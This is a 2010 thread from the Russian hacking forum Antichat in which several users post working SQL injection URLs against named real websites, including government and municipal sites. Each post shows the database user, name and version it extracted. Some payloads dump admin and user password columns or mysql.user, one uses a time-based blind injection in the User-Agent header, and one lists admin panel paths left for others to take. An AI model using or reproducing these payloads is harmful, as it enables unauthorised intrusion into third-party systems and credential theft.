Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
23.03.2010, 21:13
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635
Репутация:
1593
|
|
Код:
http://www.terreinbeveiliging.com/index.php?action=text&id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--
Username: alfabit_gps@nl15.yourname.nl
Database: alfabit_gps
Version: 5.0.51a-community
Целых 49 колонок, понятия не имею, что там может быть.
http://www.calamillor.com/guidec.php?locale=en_US&id=30+union+select+1,2,3,4 ,5,6,version(),8,9--
Вывод, по-наркомански, запрятан в тег "alt" к битому изображению  
Username: tevet@localhost
Database: webs
Version: 5.0.75-1
Последний раз редактировалось root_sashok; 23.03.2010 в 21:37..
|
|
|
24.03.2010, 00:15
|
|
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799
Репутация:
62
|
|
Код:
http://globalbass.nl/dj.php?id=-1+union+select+1,password,3,4,5,6,7,user,9,10,11,12,13,14,15,16,17+from+mysql.user--
version: 4.0.16-nt-log
user: root@localhost
database: globaltrance
---------
Код:
http://www.concept-m.fr/dj.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13--
Version: 5.0.90-log 8
User: conceptm_minus@10.0.84.26 8
Database: conceptm_minus 8
-------
Код:
ttp://www.salsaband.nl/salsa-dj.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10+from+users--
Код:
http://www.salsaband.nl/salsa-dj.php?id=-1+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10+from+information_schema.columns+where+table_name=0x7573657273+limit+1,1
Код:
http://www.salsaband.nl/salsa-dj.php?id=-1+union+select+1,2,3,concat(login,0x3a,pw),5,6,7,8,9,10+From+users+limit+1,1--
Version: 5.0.77
Database: salsaban
User: salsaban@localhost
---------
Код:
http://www.letsgetextreme.com/review-band-db.php?id=1+union+select+concat(user_pass,0x3a,user_name),2,3,4+from+users/*
version: 4.1.21-community-nt
-----
Код:
http://www.orionicon.com/embacons-db.php?id=1+union+select+COLUMN_NAME+from+information_schema.columns+where+table_name=0x61646D696E
Код:
http://www.orionicon.com/embacons-db.php?id=1+union+select+concat(admin,0x3a,password)+from+admin+limit+1,1--
user: n 432555_root@172.17.3.155
database: 432555_studypages
Version: 5.0.77-log
Последний раз редактировалось -=Razor=-; 24.03.2010 в 00:51..
|
|
|
|
24.03.2010, 00:43
|
|
Новичок
Регистрация: 19.01.2010
Сообщений: 4
Провел на форуме:
57109
Репутация:
9
|
|
Код:
http://atv.by/gallery.php?id=-10+union+select+1+--+
version: 5.0.67.d7-ourdelta-log
Base: atvby
User: atvby@208.109.181.123
Код:
http://www.obitr.by/page.php?form_id=512+union+select+1,2,3,4,5+--+
version: 5.0.51a-24+lenny2
Base: ruralbelarusby
User: ruralbelarusby@localhos |
|
|
|
24.03.2010, 00:58
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
.GOV ресурс
MySQL 5.0.84-percona-highperf-log
admin::id, user_name, password | and | general_administrator::user_name, password | and| poll_user:: user_id, username, userpass
http://www.iltod.gov.mn/news.php?id=-100+union+select+1,group_concat(0x0b,id,0x3a,user_ name,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+ad min+--
так же интересные резалты из таблицы poll_user
http://www.iltod.gov.mn/news.php?id=-100+union+select+1,group_concat(0x0b,username,0x3a ,userpass),3,4,5,6,7,8,9,10,11,12+from+poll_user+--
admin panels:
http://www.iltod.gov.mn/admin/
http://www.iltod.gov.mn/_private/
http://www.iltod.gov.mn/poll/admin/
пускает спокойно, но на монгольском я мало что понял=( забирайте
|
|
|
|
24.03.2010, 00:59
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635
Репутация:
1593
|
|
Код:
http://jogharta.com/produit.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4--
Username: jogharta@localhost
Database: jogharta
Version: 5.0.44-log
Код:
http://www.safira.org.ua/index.php?action=product&topcat=2&item=-1+union+select+concat_ws(0x3a,user(),database(),version())--
Очень странный юзернейм.
Username: '@localhost
Database: safirao_safira
Version: 5.0.89-community-log
Код:
http://www.maarav.org.il/classes/PUItem.php?lang=HEB&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--
Username: maaravo_maarav5@localhost
Database: maaravo_maarav5
Version: 5.0.89-community-log
Таблицы:
Код:
authors
authors_lang
banner
categories
categories_lang
daily_image
daily_image_topic
daily_image_topic_lang
events
events_status
flash_flood_items
forum_categories
forum_entries
forum_settings
forum_userdata
forum_useronline
item_status
items
languages
link_type
media_types
news
news_status
readers_comments
sub_categories
sub_categories_lang
user_groups
users
Пароли выводит, переменную имени не подобрал. user, username, login, name — не катят.
Последний раз редактировалось root_sashok; 24.03.2010 в 01:18..
|
|
|
|
24.03.2010, 01:19
|
|
Познающий
Регистрация: 07.08.2009
Сообщений: 36
Провел на форуме:
257153
Репутация:
34
|
|
fid.su
fid.su - организация ответственная за зону .su. Инекция с insert'ом
Код:
User-Agent: BROWSER',ip=2130706433,recdate="SECURITY HOLE" or IF(SUBSTRING((SELECT VERSION()), 1, 1)=4, 1, BENCHMARK(5999999,MD5(NOW())))#
версия 4ая, остальное влом + страшно
Последний раз редактировалось Red_EYEs; 24.03.2010 в 01:25..
|
|
|
|
24.03.2010, 01:33
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635
Репутация:
1593
|
|
Код:
http://www.nzclaytarget.org.nz/clubs/club_page.php?id=1+union+select+1,2,3,user(),database(),version(),7,8,9,10,11,12,13--
Username: nzcta@ws3.mydns.net.nz
Database: nzclaytarget
Version: 5.0.86-log
Код:
http://pla.deptan.go.id/sub_content.php?p=renstra&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6--
Username: adminpla@localhost
Database: pla_db
Version: 5.0.45-standard-log
Код:
http://www.vales.by/catalog.php?action=show_object&id=109+union+select+concat_ws(0x3a,user(),database(),version())--
Username: '@localhost 
Database: valesby
Version: 5.0.90
Последний раз редактировалось root_sashok; 24.03.2010 в 02:04..
|
|
|
|
24.03.2010, 01:55
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666
Репутация:
439
|
|
Моя первая)
отдельное спасибо Pashkela и -=Razor=- за помощь.
Код:
http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=-1+union+select+1,user(),3,database(),5,6,7,8,9,10+from+mysql.user
Username: root@localhost
Database: skyscout
Version: 4.1.22-community-nt |
|
|
|
24.03.2010, 03:50
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635
Репутация:
1593
|
|
Код:
http://netp.us/dev_news_detail.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8--
Username: dbo249050689@212.227.119.169
Database: db249050689
Version: 4.0.27-max-log (08-00-2000)
Код:
http://www.ci.bremerton.wa.us/display.php?id=1+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11,12,13,14--
Username: remcity@localhost
Database: bremcity
Version: 5.0.51a-3ubuntu5.4
Сегодня прямо квест, "найди вывод"
Вторая часть квеста состоит в том, что нужно из исходника выкопать названия таблиц
Код:
articles
events
menus
onlinepoll
pictures
quicklinks
subsections
users
tbl_COBPARCELS
tbl_CityAddresses
tbl_ISUs
tbl_SITUS
columns_priv
db
func
help_category
help_keyword
help_relation
help_topic
host
incidentlist
landlordlist
proc
procs_priv
tables_priv
time_zone
time_zone_leap_second
time_zone_name
time_zone_transition
time_zone_transition_type
user
user_info
Код:
http://www.greenville.ms.us/calendar/eventdisplay.php?id=93+union+select+concat_ws(0x3a,user(),database(),version()),2,3--
Username: greenville428045@216.251.35.189
Database: calendar_greenville_ms_us
Version: 5.0.90-log
Код:
http://adhonep.us/index.php?id_version=1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6--
Username: adhonepu_root@localhost
Database: adhonepu_adhonep
Version: 5.0.51a-standard
Вывод в ссылке, ссылка — белым шрифтом по белому фону. При наводке меняет цвет 
Код:
http://www.ifph.us/learning/research.php?ID=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--
Username: heirraiser@97.74.24.120
Database: heirraiser
Version: 5.0.67.d7-ourdelta-log
Код:
http://www.preparingheirs.us/events/index.php?ID=2+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11--
Эта инъекция общая с предыдущей, т.е. Username, Database и Version — те же.
Последний раз редактировалось root_sashok; 24.03.2010 в 10:00..
|
|
|
|
24.03.2010, 12:59
|
|
Новичок
Регистрация: 02.12.2008
Сообщений: 1
Провел на форуме:
6407
Репутация:
6
|
|
Сайт МИНСКЭНЕРГО - Министерство энергетики Беларуси
http://www.minskenergo.by/news/view/?id=15-2+union+select+1,version(),3,database(),user()/*
database: tenders
version: 5.0.45-community-nt
user: tenders@localhost |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
